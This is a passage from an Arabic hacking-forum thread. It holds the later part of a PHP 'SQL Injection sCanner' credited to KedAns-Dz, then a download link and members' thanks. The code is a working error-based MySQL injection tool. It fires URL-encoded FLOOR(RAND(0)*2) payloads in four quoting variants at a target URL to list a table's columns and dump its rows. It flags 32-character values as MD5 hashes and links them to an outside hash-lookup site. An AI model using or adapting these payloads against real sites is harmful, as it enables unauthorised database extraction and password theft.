    @$columna = "$url+%27%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";        
    }elseif($mode_eb == 2){
    @$columna = "$url+%27%29%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    }elseif($mode_eb == 3){
    @$columna = "$url+%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    }elseif($mode_eb == 4){
            @$columna = "$url+%29%20AND%20%28SELECT%201906%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    }
        
    
    
    
    
    
    
        
        @$column = @file_get_contents("$columna");
        
        
        
    
    
    echo "
        <form action=\"".$_SERVER['PHP_SELF']."?frame=4\" target=\"frame4\" method=\"post\" name=\"datas\" id=\"datas\">
        <input type=\"hidden\" name=\"url\" id=\"url\" value=\"$url\"/>
        <input type=\"hidden\" name=\"dz\" id=\"dz\" value=\"".asciiEncode($table_n)."\"/>";
        $i = 0;
        
        echo"<select name=\"num2\" id=\"num2\">";
        // One outbound request per iteration; the loop bound is the count parsed
        // from the first response.
        while ($i <= GetBetween($column)-1):
            if($mode_eb == 1){
                @$_column = "%27%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
        }elseif($mode_eb == 2){
                @$_column = "%27%29%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
        }elseif($mode_eb == 3){
                @$_column = "%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
        }elseif($mode_eb == 4){
                @$_column = "%29%20AND%20%28SELECT%205724%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28column_name%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D$table_n%20AND%20table_schema%3DDATABASE()%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
        }
        
        
        
        
        
        $nums_columna = "$url+$_column";
        $n_tcolum = file_get_contents("$nums_columna");
        $num2 = GetBetween($n_tcolum);
        echo "<option value=\"$num2\">$num2</option>";
        $i++;
        endwhile;
        echo "</select>";
        echo"<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"$mode_eb\"/>";
        echo "<input type=\"submit\" name=\"datas\" id=\"datas\" value=\"data\"/>";
        echo "<form>";
    
    
        
    }
    
    
        }
    /**
     * Frame 4: row read-out for one column, reached by the "data" form of
     * frame 3.
     *
     * Reads url, num2 (column name), dz (table name) and lol (quoting context)
     * from POST, requests a COUNT(*) for the table, then one value per iteration
     * with LIMIT $i,1. The constants 7656 / 6968 identify these requests in logs.
     *
     * Any value exactly 32 characters long is treated as an MD5 digest and gets a
     * link that opens hashchecker.de with the value in the URL, i.e. the value
     * leaves the browser for a third party when clicked. Password storage with
     * password_hash() rather than a bare MD5 digest removes the value of such a
     * lookup. Extracted values, $num3 and $dz are placed into the probe and the
     * HTML exactly as received, without escaping.
     */
    function frame4(){
        html_header();
        
    if(isset($_POST['datas']) && $_POST['datas']=='data')
    {
        $url = $_POST["url"];
        $num3 = $_POST["num2"];
        $dz = $_POST["dz"];
        
        $mode_eb = $_POST["lol"];
    
    
    // Row-count request, one variant per quoting context.
    if($mode_eb==1){
     @$datas = "$url+%27%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
    }elseif($mode_eb==2){
     @$datas = "$url+%27%29%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
    }elseif($mode_eb==3){
     @$datas = "$url+%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
    }elseif($mode_eb==4){
    @$datas = "$url+%29%20AND%20%28SELECT%207656%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas,$start1,$end2).".$dz%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
    }
    
    
    
    
    @$dato = @file_get_contents("$datas");
    
    
    
    
        $i = -1;
        
        echo "<table>";
        
        // One outbound request per iteration; the loop bound is the count parsed
        // from the first response.
        while ($i <= (GetBetween($dato)-1)):
                if($mode_eb == 1){
        @$_data = "%27%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27MEpR%27%3D%27MEpR";
        }elseif($mode_eb == 2){
                     
                @$_data = "%27%29%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27ffAM%27%3D%27ffAM";
        }elseif($mode_eb == 3){
                @$_data = "%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29";
        }elseif($mode_eb == 4){
                @$_data = "%29%20AND%20%28SELECT%206968%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6f79753a%2C%28SELECT%20MID%28%28IFNULL%28CAST%28$num3%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20".GetBetween($databas).".$dz%20LIMIT%20$i%2C1%29%2C0x3a70687a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287609%3D7609";
        }
            
        $datas2 = "$url+$_data";
        $data2 = file_get_contents("$datas2");
        $num4 = GetBetween($data2);
        // 32 characters is taken to mean an MD5 digest; the link hands the value
        // to an external lookup site.
        if(strlen($num4) == 32){
        echo "<tr><td>$num4</td><td><div OnClick=\"window.open('http://www.hashchecker.de/$num4')\" style=\"color: blue\">MD5</div></td></tr>";
        }else{
        echo "<tr><td>$num4</td><td>";
        }
        $i++;
        endwhile;
        
     //}
    
    
    echo "</table>";
    echo "<table border=0 width=400 align=center><tr><Td><center><p style='font-size: 10pt;'>";
    echo "<b>KedAns-Dz | 1337day.com * dis9.com | Made in Algeria</br></b></td></tr>";
    echo "</center>";
    }
    }
    
    
    /*
    
    
    Copycenter (.) | KedAns-Dz | (Inj3ct0r 1337day.com | Dis9 UE dis9.com)
    
    
    ... Algeria - Hassi messaoud (30500) in 20/02/2012 - 22:34 ...
    
    
    */
    ?>
    تحميل السكربت

    http://www.gulfup.com/?5egqT3


     


  2. Al-JoKeR مساعد مشرف

    رد: PHP SQL Injection sCanner

    Thank you
    Good topic
     
  3. speeedh Developer

    رد: PHP SQL Injection sCanner

    يعطيك الف عافيه
    ما قصرت &:":​
     
  4. Đѓ.Đ4řķ Developer

    رد: PHP SQL Injection sCanner

    يعطيك العافية

    مجهود رائع



    :{1}:
     
  5. иαѕѕєя Active DeveloPer

    رد: PHP SQL Injection sCanner

    يعيطك العاافيه​
     
  6. ملك الهكر 07 Developer

    رد: PHP SQL Injection sCanner

    عوافي يابطل ​
     
  7. خأإآلد DeveloPer Plus

    رد: PHP SQL Injection sCanner

    الله يعطيك العافيه
    :{1}:
    واصل حبيبي
    &:":​



     
  8. خأإآلد DeveloPer Plus

    رد: PHP SQL Injection sCanner

    تم تقيمك
    [FONT=Arial, tahoma, sans-serif]&:":[/FONT]​



     
  9. vŀяύš V • I • P

    رد: PHP SQL Injection sCanner

    تسلم ايدك يا اخى​
     
  10. яσ¢к нα¢кєя Developer

    رد: PHP SQL Injection sCanner

    بارك الله فيكـ اخوي علي وماقصرت يالغالي ..
     